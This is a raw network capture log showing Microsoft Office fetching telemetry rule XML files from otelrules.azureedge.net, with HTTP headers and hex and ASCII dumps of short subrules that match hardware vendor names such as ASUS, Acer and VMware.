                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                          ETag: "0x8DC582BA6C038BC"
                                                                                                                          x-ms-request-id: efaf982b-c01e-008e-2e47-1c7381000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162134Z-17db6f7c8cfvzwz27u5rnq9kpc00000005ag00000000ff2a
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:34 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          27192.168.2.44979213.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:34 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:34 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:34 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 427
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                          ETag: "0x8DC582BA310DA18"
                                                                                                                          x-ms-request-id: 458f517b-301e-000c-2fe6-1a323f000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162134Z-17db6f7c8cfhzb2znbk0zyvf6n00000004s000000000cynw
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:34 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          28192.168.2.44979113.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:34 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:34 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:34 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 486
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                          ETag: "0x8DC582BB344914B"
                                                                                                                          x-ms-request-id: bef1d05a-c01e-0034-2ea3-1b2af6000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162134Z-17db6f7c8cf9c22xp43k2gbqvn00000002q000000000d9pt
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:34 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          29192.168.2.44979013.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:34 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:34 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:34 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 407
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                          ETag: "0x8DC582BBAD04B7B"
                                                                                                                          x-ms-request-id: 0f9ac3ff-201e-0003-4016-1cf85a000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162134Z-17db6f7c8cfcrfgzd01a8emnyg00000002n000000000adhg
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:34 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          30192.168.2.44979313.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:34 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:34 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:34 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 486
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                          ETag: "0x8DC582B9018290B"
                                                                                                                          x-ms-request-id: cbdfa3b4-e01e-0051-2293-1c84b2000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162134Z-17db6f7c8cfjxfnba42c5rukwg000000025g0000000044gz
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:34 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          31192.168.2.44979713.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:35 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:35 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:35 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 477
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                          ETag: "0x8DC582BB8CEAC16"
                                                                                                                          x-ms-request-id: 0c32318b-701e-0098-6762-1c395f000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162135Z-17db6f7c8cfcrfgzd01a8emnyg00000002k000000000cwn3
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:35 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          32192.168.2.44979513.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:35 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:35 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:35 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 469
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                          ETag: "0x8DC582BBA701121"
                                                                                                                          x-ms-request-id: 23cc8f65-401e-0048-2a25-1c0409000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162135Z-17db6f7c8cfjxfnba42c5rukwg00000002400000000074s6
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:35 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          33192.168.2.44979813.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:35 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:35 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:35 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 464
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                          ETag: "0x8DC582B97FB6C3C"
                                                                                                                          x-ms-request-id: 92873adb-b01e-003e-0957-1c8e41000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162135Z-17db6f7c8cfqxt4wrzg7st2fm800000005b0000000000xd1
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:35 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          34192.168.2.44979613.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:35 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:35 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:35 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 415
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                          ETag: "0x8DC582BA41997E3"
                                                                                                                          x-ms-request-id: eb753988-701e-0021-591f-1c3d45000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162135Z-17db6f7c8cfqkqk8bn4ck6f72000000004xg000000006szs
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:35 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          35192.168.2.44979413.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:35 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:35 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:35 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 407
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                          ETag: "0x8DC582B9698189B"
                                                                                                                          x-ms-request-id: 6fbaa347-101e-0034-2f47-1c96ff000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162135Z-17db6f7c8cfvq8pt2ak3arkg6n000000032000000000cdud
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:35 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          36192.168.2.44979913.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:36 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:36 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:36 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 494
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                          ETag: "0x8DC582BB7010D66"
                                                                                                                          x-ms-request-id: 55879866-201e-0033-5b1c-1cb167000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162136Z-17db6f7c8cf6f7vv3recfp4a6w000000028g000000003cg3
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
